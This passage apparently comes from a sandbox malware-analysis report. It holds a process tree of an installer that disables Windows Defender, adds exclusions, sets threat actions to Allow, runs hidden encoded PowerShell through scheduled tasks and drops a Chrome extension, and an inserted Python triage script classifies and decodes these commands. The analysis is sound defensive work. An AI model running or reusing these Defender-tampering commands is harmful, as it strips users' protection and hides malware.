C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2168
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkCorfxfY" /SC once /ST 11:47:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkCorfxfY"3⤵PID:2012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkCorfxfY"3⤵PID:2944
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2972
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2536
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:888
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:323⤵PID:2928
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1792
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:643⤵PID:1740
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2772
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:323⤵PID:2128
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:324⤵PID:2384
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:643⤵PID:1752
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:644⤵PID:1756
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\TtNtWPRQARDvDBvI\llSOOLGu\fdYZfjAUxeGwrLEN.wsf"3⤵PID:1460
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\TtNtWPRQARDvDBvI\llSOOLGu\fdYZfjAUxeGwrLEN.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2212 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:324⤵PID:2164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:644⤵PID:904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:324⤵PID:972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:644⤵PID:620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:324⤵PID:1236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:644⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:324⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:644⤵PID:2976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:324⤵PID:1296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:644⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:324⤵PID:2096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:644⤵PID:1536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:324⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:644⤵PID:2580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:324⤵PID:2616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:644⤵PID:2620
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giffBDFki" /SC once /ST 21:28:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giffBDFki"3⤵PID:2496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giffBDFki"3⤵PID:1776
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2916
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1460
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1688
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1264
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YoRBImjUnYbxcjeUQ" /SC once /ST 06:13:26 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TtNtWPRQARDvDBvI\CoQKczfmRejQhlk\lnsBcGR.exe\" 1b /WXfjdidgg 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YoRBImjUnYbxcjeUQ"3⤵PID:2172
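The kVOVvTh.exe stage above makes every Defender change through reg.exe or WMIC and later reverts part of it (REG DELETE of DisableRealtimeMonitoring, the Remove ExclusionExtension calls in the next stage), so a triage pass has to read the whole sequence, not just the first write. The pieces: ThreatIDDefaultAction with data 6 sets the default action for that threat ID to Allow; DisableRealtimeMonitoring=1 under the Policies key switches real-time protection off; the Exclusions\Paths values (written to both the local and the Policies key, and to both the /reg:32 Wow6432Node view that a 32-bit reg.exe from SysWOW64 writes by default and the /reg:64 native view Defender actually reads) add path exclusions; and the /TR payload of the gTuxKqbKc, gkCorfxfY and giffBDFki tasks is a -EncodedCommand, which is base64 over UTF-16LE text. An added Python example, not part of the report, that classifies such command lines and decodes the encoded payload; the sample lines are constructed copies of lines in this report and the action-code table is Defender's documented ThreatDefaultAction value set:

```python
import base64
import re

# Constructed sample of command lines copied from this report, one of each kind
# the installer and its scheduled-task children issued against Defender.
SAMPLE_CMDLINES = [
    r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64',
    'powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
]

# Documented data values for Defender's ThreatIDDefaultAction / *ThreatDefaultAction.
THREAT_ACTIONS = {'1': 'Clean', '2': 'Quarantine', '3': 'Remove', '6': 'Allow',
                  '8': 'User defined', '9': 'No action', '10': 'Block'}

REG_RE = re.compile(r'\breg(?:\.exe")?\s+(?P<op>add|delete)\s+"(?P<key>[^"]+)"(?P<rest>.*)', re.I)
WMIC_RE = re.compile(r'MSFT_MpPreference\s+call\s+(?P<op>Add|Remove)\s+ExclusionExtension=(?P<ext>\w+)', re.I)
ENC_RE = re.compile(r'-EncodedCommand\s+(?P<b64>[A-Za-z0-9+/=]+)', re.I)


def _switch(rest, flag):
    """Value of a reg.exe switch such as /v or /d, quoted or bare; None if absent."""
    m = re.search(r'(?i)/' + flag + r'\s+(?:"([^"]*)"|(\S+))', rest)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64 over UTF-16LE text; None when the switch is absent."""
    m = ENC_RE.search(cmdline)
    return base64.b64decode(m['b64']).decode('utf-16-le') if m else None


def classify(cmdline):
    """Return a list of findings (dicts) describing Defender tampering in one command line."""
    m = REG_RE.search(cmdline)
    if m:
        op, key, rest = m['op'].lower(), m['key'], m['rest']
        vm = re.search(r'/reg:(32|64)', rest, re.I)
        # A 32-bit reg.exe lands in Wow6432Node unless /reg:64 forces the native
        # view, which is the one Defender reads; the /reg:32 twin is dead weight.
        view = vm.group(1) if vm else 'default'
        scope = 'policy' if '\\Policies\\' in key else 'local'
        value, data = _switch(rest, 'v'), _switch(rest, 'd')
        k = key.lower()
        if op == 'add' and k.endswith(r'windows defender\threats\threatiddefaultaction'):
            return [{'what': 'threat default action', 'threat_id': value,
                     'action': THREAT_ACTIONS.get(data, data), 'view': view, 'scope': scope}]
        if k.endswith(r'windows defender\real-time protection') and (value or '').lower() == 'disablerealtimemonitoring':
            state = 'disabled' if op == 'add' and data == '1' else 'restored'
            return [{'what': 'real-time protection ' + state, 'view': view, 'scope': scope}]
        if k.endswith(r'windows defender\exclusions\paths'):
            return [{'what': 'path exclusion ' + ('added' if op == 'add' else 'removed'),
                     'path': value, 'view': view, 'scope': scope}]
        return []
    m = WMIC_RE.search(cmdline)
    if m:
        verb = 'added' if m['op'].lower() == 'add' else 'removed'
        return [{'what': 'extension exclusion ' + verb, 'extension': m['ext']}]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        return [{'what': 'encoded PowerShell', 'decoded': decoded}]
    return []


def report(cmdlines):
    """Findings for every command line, in order of execution."""
    return [f for c in cmdlines for f in classify(c)]


if __name__ == "__main__":
    for finding in report(SAMPLE_CMDLINES):
        print(finding)
```

Two caveats when reading the output against this report. The Allow entries survive the cleanup: only DisableRealtimeMonitoring and the extension exclusions are reverted, the four ThreatIDDefaultAction values and the path exclusions stay. And the MSFT_MpPreference class in root\Microsoft\Windows\Defender belongs to the Defender WMI provider introduced with Windows 8, so on the Windows 7 image used for this run the WMIC Add/Remove calls are not expected to succeed; the reg.exe writes are the part that takes effect here.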
C:\Windows\Temp\TtNtWPRQARDvDBvI\CoQKczfmRejQhlk\lnsBcGR.exeC:\Windows\Temp\TtNtWPRQARDvDBvI\CoQKczfmRejQhlk\lnsBcGR.exe 1b /WXfjdidgg 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1220 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2888
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:676
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2228
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2452
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2052
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2252
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2240
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2880
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:480
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1880
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:532
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1964
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:1412
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1664
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1584
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1784
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "baOmDneVXoOuKLmJPZ"3⤵PID:2116
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:2064
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:688
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1716
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2924
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2908
-
